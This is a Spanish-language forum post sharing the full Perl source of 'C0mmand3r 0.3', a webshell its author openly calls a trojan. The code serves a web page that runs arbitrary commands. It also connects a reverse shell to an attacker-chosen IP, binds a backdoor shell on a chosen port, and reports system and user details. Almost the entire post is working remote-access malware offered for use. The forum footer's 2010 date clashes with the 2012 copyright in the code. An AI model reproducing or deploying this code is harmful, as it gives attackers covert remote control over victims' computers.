Una mejora de un troyano al estilo webshell que habia hecho el verano pasado.
#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2012
#Version 0.3
#
#A simple WebShell in Perl
#
#
use IO::Socket;
use CGI;
use Cwd;
use Win32;
my $port = rep();
sub rep {
unless ( $ARGV[0] ) {
return int("777"); #Your Can Edit 666
}
else {
return int( $ARGV[0] );
}
}
print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";
my $sock = new IO::Socket::INET(
LocalHost => 'localhost',
LocalPort => $port,
Proto => 'tcp',
Listen => SOMAXCONN,
Reuse => 1
);
while ( $jebus = $sock->accept() ) {
print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";
#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
next if $slave = fork;
close $sock;
while ( $response = <$jebus> ) {
chomp($response);
my %rta;
if ( $response =~ /GET/ig ) {
capturar($response);
}
sub capturar {
my $aa = shift;
chomp $aa;
if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) {
my $todo = $1;
if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) {
$rta{$1} = $2;
$rta{$3} = $4;
}
if ( $todo =~ /\?(.*)=(.*)/ig ) {
$rta{$1} = $2;
}
}
}
print $jebus "
<style type=text/css>
.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}
#pie {
position: absolute;
bottom: 0;
}
body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}
input,table.outset,table.bord,table,textarea,select,fieldset {
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}
a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}
</style>
";
if ( $rta{'info'} ) {
info();
print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>";
print $jebus "<center><br><br><b>Domain : </b>"
. Win32::DomainName() . "<br>";
print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>";
print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>";
print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>";
print $jebus "<b>User : </b>"
. Win32::LoginName()
. "<br><br></center>";
copyright();
}
elsif ( $rta{'console'} ) {
logouno();
print $jebus "
<br><br><center>
<form action='' method=GET>
Command : <input type=text name=cmd value=ver><input type=submit value=Execute>
</center></form><br><br>
";
copyright();
}
elsif ( $rta{'cmd'} ) {
logouno();
$lucha = $rta{'cmd'};
print $jebus "<br><br><center><fieldset>";
$lucha =~ s/\+/ /;
print $jebus "<br>[+] Command : <b>$lucha</b><br><br>";
print $jebus qx($lucha);
print $jebus "</center></fieldset>";
copyright();
}
elsif ( $rta{'reverse'} ) {
logodos();
print $jebus qq(
<center>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>
</center>
);
copyright();
}
elsif ( $rta{'ipconnect'} ) {
conectar( $rta{'ipconnect'}, $rta{'port'} );
tipo();
sub conectar {
socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") );
connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
open( STDIN, ">&REVERSE" );
open( STDOUT, ">&REVERSE" );
open( STDERR, ">&REVERSE" );
}
sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ( $^O =~ /Win32/ig ) {
infowin();
system("cmd.exe");
}
else {
infolinux();
#root();
system("export TERM=xterm;exec sh -i");
}
}
sub infowin {
print "[+] Domain Name : " . Win32::DomainName() . "\n";
print "[+] OS Version : " . Win32::GetOSName() . "\n";
print "[+] Username : " . Win32::LoginName() . "\n\n\n";
}
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}
elsif ( $rta{'backdoor'} ) {
logotres();
print $jebus qq(
<center>
<br><br><b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>
</center>
);
copyright();
}
elsif ( $rta{'portbind'} ) {
$backdoor = IO::Socket::INET->new(
Proto => 'tcp',
LocalPort => $rta{'portbind'},
Listen => SOMAXC,
Reuse => 1
);
while ( $jesus = $backdoor->accept() ) {
$jesus->autoflush(1);
print $jesus
"[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : "
. $$ . "\n\n";
print $jesus "Welcome " . $jesus->peerhost . "\n\n";
&extras;
$dir = getcwd();
print $jesus $dir . ">>";
while (<$jesus>) {
my $yeah = qx($_);
print $jesus "\n\n" . $yeah . "\n\n";
print $jesus $dir . ">>";
}
}
sub extras {
if ( $^O =~ //ig ) {
print $jesus "[+] Domain Name : "
. Win32::DomainName() . "\n";
print $jesus "[+] OS Version : "
. Win32::GetOSName() . "\n";
print $jesus "[+] Username : "
. Win32::LoginName()
. "\n\n\n";
}
else {
$s = qx("uname -a");
print $jesus "--==System Info==--\n\n" . $s;
}
}
}
elsif ( $rta{'about'} ) {
about();
print $jebus qq(
<pre><center>
¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾
¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾
¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾
¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾
¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾¾
¾ ¾¾¾¾¾¾¾¾¾¾ ¾
¾ ¾ ¾¾¾¾ ¾ ¾
¾ ¾¾ ¾¾
¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾
¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾
¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾ ¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾
¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾
¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾
¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾
¾¾¾¾¾¾ ¾¾¾¾¾¾
¾¾¾¾ ¾¾¾¾
</pre></center>
);
copyright();
}
else {
print $jebus "
<title>Commander 0.3 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>Commander</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class=main><a href=?info=true><center>Information</center></a></td><tr>
<td class=main><a href=?console=true><center>Console</center></a></td><tr>
<td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr>
<td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr>
<td class=main><a href=?about=true><center>About</center></a></td>
</table>
</center>
";
copyright();
}
$jebus->close;
}
}
continue {
$jebus->close;
}
sub logouno {
print $jebus qq(
<pre><center>
@@@@@@@@ @@
@@ @@ @@
@@ @@
@@ @@@@@@ @@ @@@@ @@@@ @@@@@@ @@ @@@@@@
@@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@@@@@@@ @@@@@@ @@ @@ @@@@ @@@@@@ @@ @@@@@@
</pre></center>
);
}
sub logodos {
print $jebus qq(
<pre><center>
@@@@@@@@@@
@@ @@
@@ @@
@@ @@ @@@@@@ @@ @@ @@@@@@ @@@@ @@@@ @@@@@@
@@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@
@@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@@@@@ @@ @@@@@@ @@ @@@@ @@@@@@
</pre></center>
);
}
sub logotres {
print $jebus qq(
<pre><center>
@@@@@@@@ @@ @@
@@ @@ @@ @@
@@ @@ @@ @@
@@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@@@
@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@
@@@@@@@@ @@@@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@
</pre></center>
);
}
sub about {
print $jebus qq(
<pre><center>
@@ @@
@@ @@ @@
@@ @@ @@ @@
@@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@
@@ @@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@ @@
@@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@ @@@@ @@
@@ @@ @@@@@@@@ @@@@@@ @@@@ @@ @@
</pre></center>
);
}
sub info {
print $jebus qq(
<pre><center>
@@ @@ @@ @@@@@@@@@@ @@@@@@@@
@@ @@@@ @@ @@ @@ @@
@@ @@@@ @@ @@ @@ @@
@@ @@ @@ @@ @@ @@ @@
@@ @@ @@ @@ @@@@@@@@ @@ @@
@@ @@ @@ @@ @@ @@ @@
@@ @@ @@@@ @@ @@ @@
@@ @@ @@@@ @@ @@ @@
@@ @@ @@ @@ @@@@@@@@
</pre></center>
);
}
sub get_ip {
my $get = gethostbyname("");
return inet_ntoa($get);
}
sub copyright {
print $jebus
"<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>";
exit(1);
}
# The End ?
Tema: [Perl] Commander 0.3 (Leído 12 veces)
Enero 24, 2010, 12:26:44 am